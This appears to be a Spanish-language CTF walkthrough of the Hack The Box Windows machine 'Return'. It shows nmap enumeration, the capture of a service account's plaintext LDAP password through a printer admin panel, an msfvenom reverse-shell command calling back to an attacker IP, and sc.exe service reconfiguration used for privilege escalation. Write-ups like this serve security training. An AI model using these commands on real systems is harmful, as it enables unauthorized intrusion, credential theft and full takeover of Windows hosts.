Zona Hacking — Writeups de CTFs y Seguridad Ofensiva

Sistema operativo	Dificultad	Fecha de Lanzamiento	Creador
Windows	Easy	27 Setiembre 2021	MrR3boot

Reconocimiento

Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

return

Enumeración inicial

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.11.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 21:21 -03
Initiating SYN Stealth Scan at 21:21
Scanning 10.10.11.108 [65535 ports]
Discovered open port 135/tcp on 10.10.11.108
Discovered open port 139/tcp on 10.10.11.108
Discovered open port 445/tcp on 10.10.11.108
Discovered open port 53/tcp on 10.10.11.108
Discovered open port 80/tcp on 10.10.11.108
Discovered open port 49674/tcp on 10.10.11.108
Discovered open port 3268/tcp on 10.10.11.108
Discovered open port 49666/tcp on 10.10.11.108
Discovered open port 49671/tcp on 10.10.11.108
Discovered open port 464/tcp on 10.10.11.108
Discovered open port 636/tcp on 10.10.11.108
Discovered open port 5985/tcp on 10.10.11.108
Discovered open port 49665/tcp on 10.10.11.108
Discovered open port 49664/tcp on 10.10.11.108
Discovered open port 49675/tcp on 10.10.11.108
Discovered open port 3269/tcp on 10.10.11.108
Discovered open port 49682/tcp on 10.10.11.108
Discovered open port 47001/tcp on 10.10.11.108
Discovered open port 593/tcp on 10.10.11.108
Discovered open port 49667/tcp on 10.10.11.108
Discovered open port 88/tcp on 10.10.11.108
Discovered open port 49721/tcp on 10.10.11.108
Discovered open port 49679/tcp on 10.10.11.108
Discovered open port 9389/tcp on 10.10.11.108
Discovered open port 49697/tcp on 10.10.11.108
Discovered open port 389/tcp on 10.10.11.108
Completed SYN Stealth Scan at 21:21, 22.10s elapsed (65535 total ports)
Nmap scan report for 10.10.11.108
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-24 21:21:27 -03 for 22s
Not shown: 63953 closed tcp ports (reset), 1556 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49671/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49675/tcp open  unknown          syn-ack ttl 127
49679/tcp open  unknown          syn-ack ttl 127
49682/tcp open  unknown          syn-ack ttl 127
49697/tcp open  unknown          syn-ack ttl 127
49721/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 22.24 seconds
           Raw packets sent: 108359 (4.768MB) | Rcvd: 67969 (2.726MB)

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49697,49721 -oN servicesScan 10.10.11.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-24 21:22 -03
Nmap scan report for 10.10.11.108 (10.10.11.108)
Host is up (0.16s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-25 00:43:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49721/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-25T00:44:12
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 20m33s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.82 seconds

Explotación inicial

echo '10.10.11.108 return.local' >> /etc/hosts

HTTP (80)

return

echo "10.10.11.108 printer.return.local" >> /etc/hosts

Validamos el usuario svc-printer

return

Nos ponemos en escucha con Netcat en el puerto 389.

nc -lnvp 389

Ingresamos la ip de nuestra máquina víctima en el formulario.

return

Enviamos el formulario y vemos que recibimos una conexión en nuestro listener de Netcat.

return

Podemos observar que es un intento de conexión al protocolo LDAP con el usuario svc-printer y además vemos las credenciales en texto plano.

svc-printer:1edFg43012!!

Validamos las credenciales.

return

El usuario tiene acceso a través de winrm.

return

Leemos el flag de user.txt.

return

Elevación de privilegios

return

El usuario svc-printer es parte del grupo Server Operators. Los miembros de este grupo pueden iniciar/detener un servicio y modificar/registrar uno nuevo.

Creamos una reverse shell con msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=4444 -f exe > shell.exe

La subimos a la máquina víctima.

Nos ponemos en escucha con NetCat por el puerto 4444.

Registramos el servicio

sc.exe config vss binPath="C:\Temp\shell.exe"
sc.exe stop vss
sc.exe start vss

return

Post Explotación

Leemos el flag de root.txt.

return

Referencia

Server Operators

Return Return

Reconocimiento

Enumeración inicial

Explotación inicial

HTTP (80)

Elevación de privilegios

Post Explotación

Referencia

Return